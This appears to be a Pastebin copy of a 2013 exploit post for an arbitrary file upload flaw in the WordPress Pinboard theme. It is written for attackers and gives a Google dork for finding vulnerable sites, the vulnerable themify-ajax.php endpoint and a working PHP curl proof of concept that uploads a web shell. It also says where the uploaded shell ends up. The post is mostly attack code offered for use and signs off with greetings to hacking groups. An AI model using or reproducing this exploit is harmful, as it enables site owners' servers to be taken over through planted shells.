Googleinurl

Exploit Title : Wordpress Themes Pinboard Arbitrary File Upl

Nov 26th, 2013
1,350
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Exploit Title : Wordpress Themes Pinboard Arbitrary File Upload Vulnerability
  2. #Author : ReC0ded
  3. #Vendor : http://themify.me/
  4. #Download : http://themify.me/themes/Pinboard
  5. #Date : 22, November 2013.
  6. #Type : php, html, htm, asp, etc.
  7. #Category : Web Applications
  8. #Vulnerability : File Upload
  9. #Tested On : Windows 7 32-bit | Google Chrome
  10.  
  11. #Dork : inurl:/wp-content/themes/pinboard/ | USE YOUR BRAIN =))
  12.  
  13. #Exploit : http://victim/[PATH]/wp-content/themes/pinboard/themify/themify-ajax.php
  14.  
  15. #POC :
  16.  
  17. <?php
  18. $uploadfile="ReC0ded.php";
  19. $ch = curl_init("http://victim/[PATH]/wp-content/themes/pinboard/themify/themify-ajax.php?upload=1");
  20. curl_setopt($ch, CURLOPT_POST, true);
  21. curl_setopt($ch, CURLOPT_POSTFIELDS,
  22. array('Filedata'=>"@$uploadfile"));
  23. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  24. $postResult = curl_exec($ch);
  25. curl_close($ch);
  26. print "$postResult";
  27. ?>
  28.  
  29. #Results See Your Shell On : http://victim/[PATH]/wp-content/themes/pinboard/uploads/{YOUR_FILE}.php
  30.  
  31. #################### Say Yes ####################
  32. $Greetz To : ./Newbie-Security ./Malang Cyber Crew ./Hacker Newbie ./Binus Hacker ./Indonesian Cyber Army ./Indonesian Security Down ./Indonesian Figther Cyber ./Devilzc0de ./Surabaya Blackhat
  33. $Thanks To : ./All Member Newbie-Security Team We Loved ./DevilScreaM ./ShadoWNamE ./grub_err0r ./R3dh34d ./ice-cream ./win32conficker ./HMBP-02 ./Mr.Alf1anz ./casper
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×